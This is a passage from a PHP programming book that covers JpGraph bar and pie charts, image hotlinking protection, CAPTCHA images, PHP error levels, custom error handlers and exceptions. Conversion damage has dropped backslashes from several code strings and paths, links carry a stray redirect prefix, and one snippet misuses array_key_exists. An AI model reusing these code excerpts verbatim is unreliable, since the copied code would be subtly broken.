       // Width, height,cache filename
       $graph = new Graph(400,200,'auto');
       // Margin widths
       $graph->img->SetMargin(40,20,20,40);
       // X text scale, Y linear scale
Images     225


 $graph->SetScale('textlin'); 

 // Plot background

 $graph->SetColor('white'); 

 // Margin color

 $graph->SetMarginColor('darkgray'); 

 // Use a drop shadow

 $graph->SetShadow(); 

 // Frame color

 $graph->SetFrame(true,'black'); 




It’s no problem to add a title to the graph. JpGraph comes with three built-in bitmap
fonts, two of which can be displayed in bold, as well as built-in support for a
number of TrueType fonts.11 Note that the TrueType fonts aren’t packaged with
JpGraph—they must be available separately, as part of your operating system fonts.
Next, we set the graph’s title:

                                                                          bargraph.php (excerpt)

 // Title text
 $graph->title->Set('Sales Figures for March');
 // Title color
 $graph->title->SetColor('white');
 // Title font
 $graph->title->SetFont(FF_VERDANA,FS_BOLD,14);



Now, let’s construct the x axis. Here, the labels are assigned using the SetTickLabels
method, ticks being the markers for each interval on the x axis:

                                                                          bargraph.php (excerpt)

 // Axis title text
 $graph->xaxis->title->Set('Product Type');
 // Axis title color
 $graph->xaxis->title->SetColor('black');
 // Axis title font
 $graph->xaxis->title->SetFont(FF_VERDANA,FS_BOLD,10);
 // Add labels
 $graph->xaxis->SetTickLabels($xdata);


11
  These include Courier, Verdana, Times, Comic, Arial, Georgia, Trebuchet, Gnome Vera, Chinese, Ja­
panese, and Hebrew fonts.
226   The PHP Anthology


       // Axis colors

       $graph->xaxis->SetColor('black','white'); 

       // Axis font

       $graph->xaxis->SetFont(FF_VERDANA,FS_NORMAL,8); 

       // Hide ticks

       $graph->xaxis->HideTicks(); 




      The y axis will take numeric values that are generated automatically once the y data
      is added:

                                                                     bargraph.php (excerpt)

       // Axis title text
       $graph->yaxis->title->Set('Units Sold');
       // Axis title color
       $graph->yaxis->title->SetColor('black');
       // Axis title font
       $graph->yaxis->title->SetFont(FF_VERDANA,FS_BOLD,10);
       // Axis colors
       $graph->yaxis->SetColor('black','white');
       // Axis font
       $graph->yaxis->SetFont(FF_VERDANA,FS_NORMAL,8);
       // Hide ticks
       $graph->yaxis->HideTicks();



      In the following code, we create a new BarPlot object that handles the drawing of
      the bars on the chart:

                                                                     bargraph.php (excerpt)

       // Instantiate with Y data
       $bplot = new BarPlot($ydata);
       // Width of bars
       $bplot->SetWidth(0.75);
       // Set bar background color
       $bplot->SetFillColor('darkgray');



      All that remains is to add the bar chart plot object to the graph object, and send it
      to the browser:
Images     227

                                                                              bargraph.php (excerpt)

 $graph->Add($bplot);
 $graph->Stroke();
 ?>



Figure 8.8 shows the outcome—it’s not bad for just 33 lines of PHP, is it?




                   Figure 8.8. Graph revealing a massive demand for pens in March


Creating a Pie Chart
Another type of graph that can be built very easily with JpGraph is the pie chart.
Let’s use the sample data we used in the last example to build a pie chart.

At the start of the script, we must include the main pie chart class and the class for
a three-dimensional pie chart:

                                                                               piechart.php (excerpt)

 <?php
 error_reporting(E_ALL ^ E_NOTICE);

 require_once ('jpgraph.php');
 require_once ('jpgraph_pie.php');
 require_once ('jpgraph_pie3d.php');

 $xdata = array('Mousemats','Pens','T-Shirts','Mugs'); // X Axis
 $ydata = array (35,43,15,10);



This time, rather than using the Graph class, we use the PieGraph class:
228   The PHP Anthology

                                                                    piechart.php (excerpt)

       // Width, height, cache filename
       $graph = new PieGraph(400,200,'auto');
       // Margin color
       $graph->SetMarginColor('white');
       // Use a drop shadow
       $graph->SetShadow();
       // Frame color
       $graph->SetFrame(true,'black');



      We set this chart’s title as we did for the previous graph:

                                                                    piechart.php (excerpt)

       // Title text
       $graph->title->Set('March Sales');
       // Title color
       $graph->title->SetColor('black');
       // Title font
       $graph->title->SetFont(FF_VERDANA,FS_BOLD,14);



      We also need a legend to identify what each segment of the pie chart represents:

                                                                    piechart.php (excerpt)

       // Legend text color
       $graph->legend->SetColor('black');
       // Legend background color
       $graph->legend->SetFillColor('gray');
       // Legend position
       $graph->legend->Pos(0.02,0.61);



      Now, we create the three-dimensional pie chart object; we instantiate it with the y
      data while using the x data for the legends, and pop out two of the pie slices for
      effect:
Images     229

                                                               piechart.php (excerpt)

 // Instantiate 3D pie with Y data
 $pie = new PiePlot3d($ydata);
 // Add X data to legends
 $pie->SetLegends($xdata);
 // Set color theme (earth|pastel|sand|water)
 $pie->SetTheme('earth');
 // Center relative to X axis
 $pie->SetCenter(0.36);
 // Size of pie radius in pixels
 $pie->SetSize(100);
 // Set tilt angle of pie
 $pie->SetAngle(30);
 // Pop out a slice
 $pie->ExplodeSlice(2);
 // Pop out another slice
 $pie->ExplodeSlice(3);



We’ll display a label next to each segment on the chart to identify the percentage
of the whole that segment represents:

                                                               piechart.php (excerpt)

 // The font
 $pie->value->SetFont(FF_VERDANA,FS_NORMAL,10);
 // Font color
 $pie->value->SetColor('black');



Finally, we add our pie chart object to the graph object and send it to the browser:

                                                               piechart.php (excerpt)

 $graph->Add($pie);
 $graph->Stroke();
 ?>



The result of our work is shown in Figure 8.9.
230   The PHP Anthology




                                  Figure 8.9. The not-so-humble pie chart


      Discussion
      JpGraph represents the premiere graphing solution for PHP, and it offers much more
      functionality than we’ve had a chance to explore with these examples. Of particular
      note is the fact that this solution allows you to store the rendered graphs as PNG
      files, so that you can render each graph once and reuse the finished image. If you
      wanted to save the graph created by the code above, you’d simply change the call
      to Stroke by supplying a filename, making sure that the web server has permissions
      to write to this location. Here’s an example:

       $graph->Stroke('humble_pie.png');



      This process will create a file called humble_pie.png, and won’t return anything to
      the browser.


      How do I prevent the hotlinking of images?
      One problem you may encounter, particularly if your site hosts unique images, is
      other sites that hotlink to your images from their pages, in order to make it seem as
      though they own or host your cool images. Aside from the potential copyright issues
      here, hotlinking of your images by outside sites may also eat up your bandwidth.
      Hotlinking is to be avoided like the plague, as I’m sure you’ll agree!

      Solutions
      Here we have two solutions; one uses the mod_rewrite extension to Apache and
      the other uses PHP sessions.
Images     231

Using Apache’s mod_rewrite
The default behavior of a web browser is to send a referer value with each HTTP
request. This value represents the URL from which the current request originated.
For HTTP requests for images, this URL should reflect the page on which the images
appear. We can use Apache’s mod_rewrite to check the referral information that
the visiting browser provides to ensure that the referring source for all requests for
our site’s images is a local web page. For example, we can place these settings in
our web server’s http.conf file:

 SetEnvIfNoCase Referer "^http://www.sitepoint.com/"

 ➥ locally_linked=1

 SetEnvIfNoCase Referer "^http://sitepoint.com/" locally_linked=1

 SetEnvIfNoCase Referer "^$" locally_linked=1

 <FilesMatch ".(gif|png|jpe?g)$">

     Order Allow,Deny

     Allow from env=locally_linked

 </FilesMatch>



Here, we indicate that any request for a file with a name that ends in .gif, .png, .jpeg,
or .jpg, and which contains http://www.sitepoint.com/, http://sitepoint.com/,
or a blank string in the referer field, should be considered valid. This specification
should therefore block any requests for images for which none of those values are
reflected in the referer field. We need to allow requests with a blank referer field,
as they could be legitimate requests—it’s likely that some requests won’t have
referer information. For example, it’s entirely reasonable for a visitor to your web
site to have disabled the reporting of referer information for privacy reasons. In
short, the field cannot be relied upon to determine that hotlinking is taking place;
rather than risk blocking images for what may be a legitimate request, we need to
allow such requests.

Using PHP Sessions
Another option is to use PHP sessions to establish that the person viewing the image
is a visitor to your site. The trick is to register a session variable that a visitor must
have in order to be able to view the image, then use a second script to render the
image. For example, here’s a simple web page that displays an image, where the
image source URL is a PHP script that ensures that only valid site visitors can see
the image:
232   The PHP Anthology

                                                                                    hotlinking.php (excerpt)

       <?php
       session_start();
       $_SESSION['viewImages'] = true;
       ?>
       <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
           <title>Preventing Hotlinking</title>
           <meta http-equiv="Content-Type"
               content="text/html; charset=iso-8859-1" />
         </head>
         <body>
           <p>Here is the image:</p>
           <img src="getimage.php?img=husky.jpg">
         </body>
       </html>



      Notice that this code registers a session variable called viewImages, and a value of
      getimage.php?img=husky.jpg appears in the src attribute of the <img> tag. Here’s
      the code for that getimage.php script. Firstly, we check the viewImage session variable
      to see that it has been set to true:

                                                                                     getimage.php (excerpt)

       <?php
       session_start();
       if (isset($_SESSION['viewImages']) &&
           $_SESSION['viewImages'] == true)
       {



      If the viewImage session variable has been set to true, the image name provided
      via the $_GET['img'] variable is checked to ensure that it’s registered in the array
      of allowed images, $images:12




      12
          A more practical alternative is to store the list of images in a database. However you manage the list,
      it’s important to verify that the file requested is one you intended to grant access to; otherwise, you may
      be allowing access to more than you expect.
Images    233

                                                            getimage.php (excerpt)

   $images = array(
       'golden_retriever.jpg',
       'husky.jpg'
       );
   if (isset($_GET['img']) && in_array($_GET['img'],$images))
   {



The request is valid, so we output the response headers and the image:

                                                            getimage.php (excerpt)

       $dims = getimagesize('sample_images/'.$_GET['img']);
       header('Content-Disposition: inline; filename=' . $_GET['img']);
       header('Content-Type: '.$dims['mime']); # PHP 4.3.x +
       header('Content-Length: ' . filesize('sample_images/' .
           $_GET['img']));
       readfile('sample_images/'.$_GET['img']);
   }



Notice that the script also uses the getimagesize function you saw earlier in “How
do I resize images without stretching them?” to obtain the correct MIME type for
the image.

Finally, we handle the error conditions by returning an HTTP status of 404 Not
Found:

                                                            getimage.php (excerpt)

   else
   {
     header("HTTP/1.1 404 Not Found");
     header("Content-Type: text/plain" );
     echo "Invalid image or no image specifiedn";
   }
 }
 else
 {
   header("HTTP/1.1 404 Not Found");
   header("Content-Type: text/plain" );
234   The PHP Anthology


         echo "This image is protected from hotlinkingn";

       }

       ?>




      This protection should stop all but the most determined hotlinkers.


      How do I create images that can be
      verified by humans only?
      With the ever-growing number of automated spamming robots which tirelessly
      scour the Web, human-verification techniques are becoming an increasingly neces­
      sary part of the creation of web forms. The most common technique is the Completely
      Automated Public Turing Test to Tell Computers and Humans Apart—conveniently
      abbreviated to CAPTCHA—which presents the visitor with a word, or sequence of
      characters, in such a way that it’s hard for machines to decipher, but easy for a hu­
      man being to read and type in.13

      Solution
      Conveniently, the JpGraph library we discussed in “How do I display charts and
      graphs with PHP?” comes with an extremely easy-to-use CAPTCHA implementation:

                                                                                        captcha.php (excerpt)

       <?php
       require_once "jpgraph_antispam.php";
       $spam = new AntiSpam();
       $chars = $spam->Rand(6);
       $spam->Stroke();
       ?>



      A sample result of this script is shown in Figure 8.10.




                                   Figure 8.10. A CAPTCHA image created using JpGraph



      13
           You can read more about CAPTCHA at the official web site: http://www.captcha.net/.
Images     235

If you want to specify a particular word to appear in the box, simply change the
call to Rand with:

 $spam->Set("my_string");



Discussion
Of course, this is only half the story. You’ll need to store the CAPTCHA text some­
where—such as within a session variable—in order to validate the user-entered
version of the text on the next page. Don’t pass the text through as a form field,
though—even a hidden one—as it could be altered by a malicious user.


Summary
In this chapter, we’ve examined the topics of MIME types, resizing images, creating
galleries, extracting EXIF information, watermarking, producing graphical charts,
preventing the hotlinking of your images, and creating CAPTCHA images. Add the
tips from other chapters in this book into the mix, and you’re well equipped to
create a host of image manipulation scripts, from the downright useful to the truly
unique.

However, one issue you should consider is the performance implications of on-the­
fly image manipulation, which chews through a significant amount of processing
time. Consider a gallery of 100 folders, each holding 100 images; this isn’t a partic­
ularly excessive number, even for the casual holiday-maker. The creation of 10,000
thumbnails for every visitor is not a small task. Similarly, creating your company
web site’s banner image for every page load is not only time-consuming, but also
largely unnecessary.

While the simple thumbnail caching techniques we covered here might suit many
cases, they won’t be appropriate for those instances where the image might change
over time—the creation of charts based on ever-changing datasets is a case in point.
I highly recommend you refer to Chapter 11, for more advanced performance im­
provement techniques.

The practice of manipulating images in PHP is widespread. Examples include social
networking sites that create thumbnails of your profile image, web page forms that
make use of CAPTCHA images, and photo gallery sites that allow you to edit, crop,
236   The PHP Anthology

      and rotate your images in the web browser (most likely through the liberal sprinkling
      of JavaScript and Ajax). What you can achieve is, more or less, only limited by your
      imagination!
9
                                                 Chapter




Error Handling
In PHP, errors are used to indicate syntax, environmental, or programming problems:

syntax errors	              These are unrecoverable compile-time errors that indic­
                            ate a syntax problem and cause the PHP interpreter to
                            halt.

environmental errors	       Environmental errors are problems associated with the
                            script’s runtime environment and associated services.
                            Such errors may indicate a database server being un­
                            available, a file that’s unable to be opened, restrictions
                            resulting from permission levels, and so on.

programming errors	         Programming errors are unexpected events that occur
                            during normal program execution. This type of error
                            may indicate, for example, passing unexpected argu­
                            ments to a function call (such as an array when the
                            function expects a string), referencing undefined vari­
                            ables or array indices, and so on.
238   The PHP Anthology


             The Logic Error
            Another type of error—the logic error—is common but much harder to detect.
            Such an error produces an incorrect result as the output of apparently successful
            execution. These types of errors are often program design problems created by
            the programmer. They’re generally addressed during unit testing, and will not be
            covered in this chapter.


      Errors in PHP 5 come in two flavors: standard PHP errors and exceptions.

      Standard PHP error reporting handles all kinds of errors. Error messages are reported
      globally, and each is associated with an error level that represents the error’s
      severity or type. Traditionally, PHP environmental and programming errors were
      handled via a function’s return value, or by generating global warnings or fatal errors
      using the trigger_error or die functions. However, this was typically only the
      case for developers using versions prior to PHP 5, in which no other error reporting
      method was available.

      In PHP 5, exceptions are used to indicate that an exceptional event—for example,
      an environmental or programming error—has occurred, disrupting the normal exe­
      cution of the script. Exceptions are reported using the throw statement, usually to
      indicate that execution cannot continue as expected. They’re caught and handled
      using a try {…} catch(Exception $e) {…} block, which is included as part of
      programming logic. Throwing and catching exceptions is the primary error-handling
      mechanism of object oriented programming. Every exception object is an instance
      of, or an instance of a subclass of, PHP 5’s native Exception class.

      In this chapter, we’ll look at the flexibility PHP offers in order to let us extend its
      native error- and exception-reporting mechanisms. We’ll also see how you can
      harness these mechanisms to gain greater control over the ways in which errors and
      exceptions are handled. These tools will help you when you’re dealing with errors,
      and provide you the means with which to gracefully exit execution, easily debug
      your applications, and successfully monitor the health of your applications.


      What error levels does PHP report?
      As I noted in the introduction, PHP errors fall into a variety of categories. Effective
      harnessing of PHP’s error-handling mechanisms requires some knowledge of PHP
Error Handling   239

errors, so let’s take a quick look at a summary of PHP error levels. You may also
want to check out the PHP error function manual page for full information on this
topic.1

Solution
PHP categorizes errors into various levels, each representing an integer bit operat­
or—the integer increasing with error severity. The error levels most developers need
to understand are shown in Table 9.1.2


What built-in settings does PHP
offer for error handling?
If PHP can generate errors, there must be some automated way to handle these errors,
right? Providing error reporting facilities without the capabilities to handle the errors
leaves developers hobbled. So, what error handling settings are available to de­
velopers?

Solutions
PHP has several built-in mechanisms for displaying and logging errors. Each of the
following directives may be administered via ini_set, your web server’s .htaccess
file, or the php.ini file.

The error_reporting Directive
Set the error_reporting directive to indicate which errors need to be reported.
During development, you’d typically set this directive to E_ALL | E_STRICT, which
will notify you of any PHP errors that occur in your application. Once your code
moves to the production environment, you may want to tighten this setting up a bit
so that your error logs (which we’ll discuss in detail in a moment) don’t fill up;
E_ERROR | E_USER_ERROR | E_WARNING | E_USER_WARNING is usually a good setting
for production environments.




1
    http://www.php.net/errorfunc/

2
    Note that the _USER variants indicate errors that are triggered in user-generated code by

trigger_error or die, and that are of a roughly equivalent level of severity.
240   The PHP Anthology

      Table 9.1. PHP Error Levels

       Level                                     Description

       E_NOTICE / E_USER_NOTICE                  This notice indicates a potential error in the
                                                 script—note my emphasis on potential. Errors of
                                                 this sort typically mean that something has
                                                 occurred that may indicate logical errors or
                                                 omissions, even though it hasn’t caused the PHP
                                                 interpreter to fail. Examples include accessing
                                                 undefined variables or array indices.

       E_WARNING / E_USER_WARNING                A warning indicates a nonfatal error from which
                                                 PHP has recovered. Warnings are generally reserved
                                                 for environmental errors, such as the inability of
                                                 the executing script to access a database or web
                                                 service, errors that occur while you’re running a
                                                 third-party extension, and so on.

       E_ERROR / E_USER_ERROR                    These are fatal runtime errors from which PHP was
                                                 unable to recover; typically, they will be errors that
                                                 occur on the OS level, such as problems
                                                 encountered while allocating memory or disk space.

                                                 Note that E_USER_ERRORs are actually
                                                 recoverable; when such errors are caught in a
                                                 custom error handler, the developer can choose
                                                 whether or not to exit script execution.

       E_STRICT                                  E_STRICT errors are basically notices, but these
                                                 are deployed to indicate that code you’ve used may
                                                 be deprecated, or may not follow best practices as
                                                 determined by the PHP interpreter.


      The display_errors Directive
      When display_errors is set, PHP errors will be displayed inline in your script’s
      output. This is a good setting to use in development, though it has the potential to
      disrupt any HTTP headers you’re trying to send if an error occurs while they are
      being output.

      Once your application’s in production, turn display_errors off so that these mes­
      sages are not displayed to your users.
Error Handling      241

The log_errors and error_log Directives
If log_errors is set, errors will be logged to the location specified in the error_log
directive. This setting is useful for maintaining a running log of the errors en­
countered in your application or site, and is helpful because it acts as a reference
for all the errors that may arise when the display_errors directive is disabled.

You will likely want to set ignore_repeated_errors and ignore_repeated_source
to prevent those logs from filling up when the same error occurs repeatedly.


How can I trigger PHP errors?
The capability to trigger errors is not restricted to the PHP interpreter. At times, you
may find it useful to generate PHP errors yourself—they can be used as a debugging
aid, to generate deprecation notices in code you’re releasing to others, and more.
So, how do you trigger PHP errors?

Solution
You can trigger errors within your code using PHP’s trigger_error function. This
function has the following prototype:

 trigger_error($error_message, $error_type = E_USER_NOTICE);



The $error_type argument must be one of the user error constants E_USER_NOTICE,
E_USER_WARNING, or E_USER_ERROR, which, as noted in the code above, defaults to
E_USER_NOTICE.


Discussion
When they first discover trigger_error, PHP developers have a tendency to use
it for any error conditions they observe in their code. However, better strategies
exist.

Trigger E_USER_NOTICEs primarily in development when debugging your code.
Notices can be helpful for indicating the values that have been set, when certain
pieces of code are executing, and so on. (Note, however, that this isn’t the most ef­
ficient way to debug.)
242   The PHP Anthology

      Trigger E_USER_WARNINGs when your code detects exceptional situations from which
      it can recover gracefully. For example, such a situation might arise if a web service
      cannot be contacted, but your code is still able to generate an error message; in this
      case, the warning might serve to indicate to you later to check your application’s
      connectivity with the web services server.

      Trigger E_USER_ERRORs when your code hits a problem from which it cannot recover.
      Examples of this kind of problem include a situation in which the executing script
      is unable to connect to your database, or you discover that your web site template
      directory is unreadable.


      How do I implement a custom
      error handler with PHP?
      The php.ini settings for handling errors are fairly limited. They really only cover the
      tasks of displaying and logging errors—you can’t even specify the format in which
      those errors are logged or displayed! What if you want to do something other than
      these tasks?

      Solution
      PHP allows developers to define custom error handlers. Such error handlers may
      constitute any valid PHP callback: a function, a static class method, or a dynamic
      class method. Whatever callback you decide to use, it must follow the error handler
      prototype:

       function handler($errno, $errmsg[, $filename[, $linenum[, $vars]]]) 



      When your custom error-handling function is called, the first parameter $errno
      will contain the level of the error as an integer; the second parameter, $errmsg, will
      contain the description of the error. $filename contains the name of the file con­
      taining the code that raised the error, $linenum contains the line number where the
      error was raised, and $vars contains an array of all variables that existed in the
      scope in which the error was triggered. You can choose to perform any task you
      like within your error handler: log errors, mail the error details to system adminis­
      trators or developers, print the error details, and so on.
Error Handling      243

However, you should understand that if you do not explicitly exit script execution
in your error handler, program execution will continue from the location at which
the error was triggered originally. Your code will have no idea what tasks were
undertaken in the error handler, though.

Use the set_error_handler function to tell PHP to use your error handler:

 set_error_handler($error_handler[, $error_types])



The first parameter is a callback that references your error handler. The optional
second parameter is used to tell PHP which error types should be handled by your
custom function. By default, if no error type is provided, all errors will be handled
except for E_ERROR, E_PARSE, E_CORE_ERROR, E_CORE_WARNING, E_COMPILE_ERROR,
E_COMPILE_WARNING, and E_STRICT. Since you can specify the types, you can specify
multiple error handlers—one for each type you wish to handle.

An easier solution, however, is to use a single error handler for all error types you
wish to handle, and in it employ a switch statement that uses the value of the first
argument to the handler function—represented by $errno—to select alternative
actions that respond to specific error types. $errno is the error level of the triggered
error, the integer value represented by the error type constants listed in “What error
levels does PHP report?”. Then, the error handler needs to return true if the error
was handled, or false if not; returning false tells PHP to pass on error-handling
control to the default error handler. As an example, here’s a PHP 5 class that imple­
ments a custom error handler which selects alternative actions appropriate to the
level of the error raised:

                                                         ErrorHandler.class.php (excerpt)

 <?php
 class ErrorHandler
 {
   protected $_noticeLog = '/tmp/notice.log';
   public $message = '';
   public $filename = '';
   public $line = 0;
   public $vars = array();
   public function __construct($message, $filename, $linenum, $vars)
   {
     $this->message = $message;
244   The PHP Anthology


           $this->filename = $filename;

           $this->linenum = $linenum;

           $this->vars     = $vars;

         }




      The constructor accepts the various error attributes as arguments and stores them
      in the object’s properties. The $_noticeLog variable stores the location of the log
      file for E_USER_NOTICE level error messages. If you’re testing on a Windows machine
      you should change this value to something like C:notice.log, or an appropriate
      location on your system.

      Here’s the custom error-handling method of our class:

                                                               ErrorHandler.class.php (excerpt)

         public static function handle($errno, $errmsg, $filename,
             $line, $vars)
         {
           $self = new self($errmsg, $filename, $line, $vars);
           switch ($errno) {
             case E_USER_ERROR:
               return $self->handleError();
             case E_USER_WARNING:
             case E_WARNING:
               return $self->handleWarning();
             case E_USER_NOTICE:
             case E_NOTICE:
               return $self->handleNotice();
             default:
               return false;
           }
         }



      The handle method above instantiates an ErrorHandler object with the error mes­
      sage, filename, line number, and variable context, and then calls the appropriate
      handler method based on $errno.

      If the error level does not match the levels handled by this class, it reverts the error
      flow to the default error handler by returning false.
Error Handling         245

Now we can build the methods that handle the different types of errors. First up is
the handleError method:

                                                                       ErrorHandler.class.php (excerpt)

      public function handleError()
      {
        ob_start();
        debug_print_backtrace();
        $backtrace = ob_get_flush();
        $body =<<<EOT
    A fatal error occured in the application:
    Message:   {$this->message}
    File:      {$this->filename}
    Line:      {$this->line}
    Backtrace:
    {$backtrace}
    EOT;
        error_log($body, 1, 'sysadmin@example.com',
            "Fatal error occurredn");
        exit(1);
      }



handleError is used to handle E_USER_ERROR level errors. When it’s called, this
method sends an email to the system administrator and halts execution. It uses a
little-known feature of PHP’s error_log function to send the email—if you specify
1 for the second argument and an email address as the third argument, it employs
the php.ini settings for sendmail to send an email. Finally, handleError halts execu­
tion of the script using exit.3

Our next method is handleWarning:

                                                                       ErrorHandler.class.php (excerpt)

        public function handleWarning()
        {
          $body =<<<EOT
    An environmental error occured in the application, and may
     indicate a potential larger issue:
    Message:   {$this->message}



3
    Calling exit with an integer exit status parameter of anything other than 0 indicates a script failure.
246   The PHP Anthology


       File:      {$this->filename}

       Line:      {$this->line}

       EOT;

           return error_log($body, 1, 'sysadmin@example.com',

               "Subject: Non-fatal error occurredn");

         }




      handleWarning is used to handle E_USER_WARNING and E_WARNING errors. Like
      handleError above, it sends an email to the system administrator; however, instead
      of halting execution, it simply returns the result of the error_log function—true
      if the function succeeds, false if it fails.

      Finally, the handleNotice method:

                                                            ErrorHandler.class.php (excerpt)

           public function handleNotice()
           {
             $body =<<<EOT
       A NOTICE was raised with the following information:
       Message:   {$this->message}
       File:      {$this->filename}
       Line:      {$this->line}
       EOT;
           $body = date('[Y-m-d H:i:s] ') . $body . "n";
           return error_log($body, 3, $this->_noticeLog);
         }
       }



      handleNotice handles E_USER_NOTICE and E_NOTICE level errors. Since notices do
      not represent dangerous errors, we assume that the system administrator doesn’t
      need to know about them immediately, and log them to a file instead of sending an
      email.

      Finally, we tell PHP that we want ErrorHandler::handle to act as our error handler,
      by using the aptly named set_error_handler function:

                                                            ErrorHandler.class.php (excerpt)

       set_error_handler(array('ErrorHandler', 'handle'));
Error Handling      247


Discussion
PHP error handlers are trivial to implement, and, because you can write your own
functionality, you can create whatever error handling strategies you desire. Be
careful to test your code stringently, however, as you don’t want to find yourself in
a circular error-handling situation, where your error handler starts emitting errors
that it then needs to handle itself.


How do I log and report errors?
You need to create a robust web application, but even the best software engineers
make mistakes. Perhaps you’re using third-party libraries that omit deprecation
notices. Or maybe your code, though in its infancy, has been pushed into production
due to time constraints.

You need to keep track of the errors occurring on your site somehow. What tools
does PHP offer for the job?

Solution
Logging errors is one thing—reporting them is a whole different ballgame. Logging
is usually best done via PHP’s own logging facilities. For example, you’ll recall that
the error_log setting can be set at the php.ini level, using the ini_set function.

PHP’s error_log function can be used both to log errors and to send emails. It can
log errors to PHP’s error_log or an alternate log destination, or send an email to a
specified address (it uses mail to do the actual sending). Also, if you’re using a de­
bugger, it can send the information over the debugging connection.

While PHP’s logging functionality is nice, it still needs to be triggered within your
code—typically via your custom error handler.

The simplest way to log errors is to set up logging via your php.ini settings, like so:

 error_reporting(E_ALL & (~E_NOTICE | ~E_USER_NOTICE));

 ini_set('error_log', '/tmp/php-error.log');

 ini_set('ignore_repeated_errors', true);

 ini_set('ignore_repeated_source', true); 

 ini_set('log_errors', true);
248   The PHP Anthology

      These settings will log all errors to /tmp/php-error.log except notices, repeated errors,
      and errors reported from the same source.

      You can also set up a custom error handler to conduct logging or reporting. Typically,
      the safest and easiest way to do so is simply to use error_log, as we saw in the
      solution in “How do I implement a custom error handler with PHP?”.

      If you intend to use email to report errors in your custom error handler, doing so
      via the error_log function or the standard PHP mail function may not be the best
      solution. A third-party library, for example PEAR::Mail, may be better suited to the
      task. In those cases, use the library within your custom error handler to send the
      email.4

      Finally, keep in mind that log files and email are not the only ways to report errors.
      You could also tell PHP to send SMS text messages and pager messages to your
      sysadmins or developers.


      How can I use PHP

      exceptions for error handling?

      PHP errors are useful, but they pose many problems:

      ■	 There’s no way to allow an error to bubble up the calling stack—errors must be
         handled immediately.

      ■	 The only way to exit the function or method that’s executing when an error is
         triggered is to have the handler exit script execution.

      ■	 It’s difficult to determine what the problem is without interrogating the error
         message, as any error you trigger yourself won’t have an associated error code
         or name.

      PHP 5 marked the introduction of a new error-handling scheme: exceptions. As I
      mentioned at the start of this chapter, an exception is used to denote exceptional
      behavior on the part of the script—situations in which something went wrong, or
      something unexpected occurred. Exceptions are thrown by your code, and bubble
      up through the code until they’re caught:

      4
          For more information about sending email with PHP, see Chapter 7.
Error Handling     249


 throw new Exception(

     "There's something rotten in the state of this code"); 



So, how can we use PHP exceptions to perform error handling?

Solution
Unlike PHP errors, exceptions can always be caught within your code, which allows
you to handle them gracefully when you have the facilities to do so. When an ex­
ception is thrown, PHP will immediately look for a matching catch block and run
the code within it. Thus, it’s important to wrap your code within a try {…}
catch(Exception $e) {…} block at the point at which you wish to catch potential
exceptions. If an exception is not caught, PHP will generate a E_FATAL error with
the message “Uncaught Exception.”

Now, within the catch block, you can deal with the exception in the way you feel
is best. For example, imagine you’re generating a web page that includes data from
a web service. You may throw an exception when the web service is unavailable,
but catch it later and display a “Service unavailable” message within the web page
you’re generating:

 try

 {

   $data = $this->getDataFromService(); 

 }

 catch (ServiceUnavailableException $e)

 {

   $data = 'Service unavailable'; 

 } 



In this example, the script doesn’t exit completely as a result of the error. Instead,
the script finishes executing and the web page is generated successfully, so you’re
able to deal with the error at the right time and take appropriate action.

If this sounds good, you’ll be pleased to hear that it gets even better—PHP 5 saw
the introduction of object type hinting. This facility forces parameters of functions
and methods to be objects of a particular class, or subclasses of that class. You can
use type hinting when you’re catching exceptions in a catch (Exception $e) {…}
block—multiple catch blocks can be used to catch different classes of exceptions:
250   The PHP Anthology


       try

       { 

         ⋮ try some code…
       }

       catch (PDOException $e)

       { 

         ⋮ handle PDO exceptions…
       }

       catch (Zend_Exception $e)

       { 

         ⋮ handle Zend Framework exceptions…
       }

       catch (Exception $e)

       { 

         ⋮ handle all other exceptions…
       } 



      Discussion
      One common mistake novices make is to use exceptions for every type of error
      situation. For instance, I’ve often seen constructs like this used to validate data:

       public function isValidData($data) 

       {

         if (!is_array($data))

         { 

           throw new Exception('Invalid data');

         } 

         if (!array_key_exists($data))

         {

           throw new Exception('Id key missing');

         } 

         ⋮ finish validating…
         return true;

       } 



      What’s wrong with this code? Simply this: invalid data is just one of the possible
      results; it’s not an exceptional situation. In the case above, it’s best simply to return
      an error message or true. Then, you can always check for Boolean true or is_string
      on the return value:
Error Handling     251


 public function isValidData($data) {

   if (!is_array($data))

   {

     return 'Invalid data'; 

   }

   if (!array_key_exists($data))

   {

     return 'Id key missing';

   } 

   ⋮ finish validating…
   return true;

 } 



Another common mistake that’s related to the one above is to use exceptions as part
of the script’s program flow. Code that uses the original definition of isValidData
above, which throws exceptions, might look like this:

 try

 {

   $result = $this->isValidData($data); 

 }

 catch (Exception $e)

 {

   if ('Invalid data' == $e->getMessage())

   { 

      $error = $this->missingData(); 

   }

   elseif ('Id key missing' == $e->getMessage())

   {

      $error = $this->missingId($data); 

   }

   else

   {

      $error = 'Unknown error'; 

   }

 } 

 if (isset($error))

 { 

    ⋮ handle error…
 } 



In this example, the code uses exceptions within the program flow to make decisions;
it’s almost the equivalent of programming using GOTO statements. This is a fairly
252   The PHP Anthology

      confusing way to express decision-making branches in your code, particularly when
      other methods are much more suitable (including testing return values from the
      function/method call, performing the various error method calls within the called
      function/method, and so on).

      Use exceptions when you can detect an event or condition in a unit of code that
      prevents any further execution. Good examples include:

      ■	 database errors
      ■	 web service call errors
      ■	 filesystem errors (such as permissions, missing paths, and so on)
      ■	 data encoding errors (until PHP 6 is out, that is)
      ■	 parse errors (for example, when parsing configuration or template files)

      When used wisely and sparingly, exceptions become a very powerful error-handling
      tool. For more information on PHP exceptions, read the relevant PHP manual page.5


      How do I create a custom Exception class?
      The base Exception class provided in PHP 5 can be extended, but since exceptions
      bubble up the stack until they’re caught, why would you bother to create a custom
      Exception class? Well, if you use different Exception classes, it becomes much
      simpler to target specific types of exceptions and recover from them.

      Other reasons why you’d create a custom Exception class include:

      ■	 You want to log specific types of exceptions.

      ■	 You need to mail exception messages of particular classes.

      ■	 You want to create special __toString output for pretty printing exceptions, or
         use exceptions in other specialized circumstances (for example, an XML-RPC
         client or server might use an exception class for fault responses, with the
         __toString method creating the XML fault response).




      5
          http://php.net/exceptions/
Error Handling      253


Solution
Exception classes extend either the base PHP Exception class, or a class derived
from it. To be able to catch your custom exception, all you need to do is extend it:

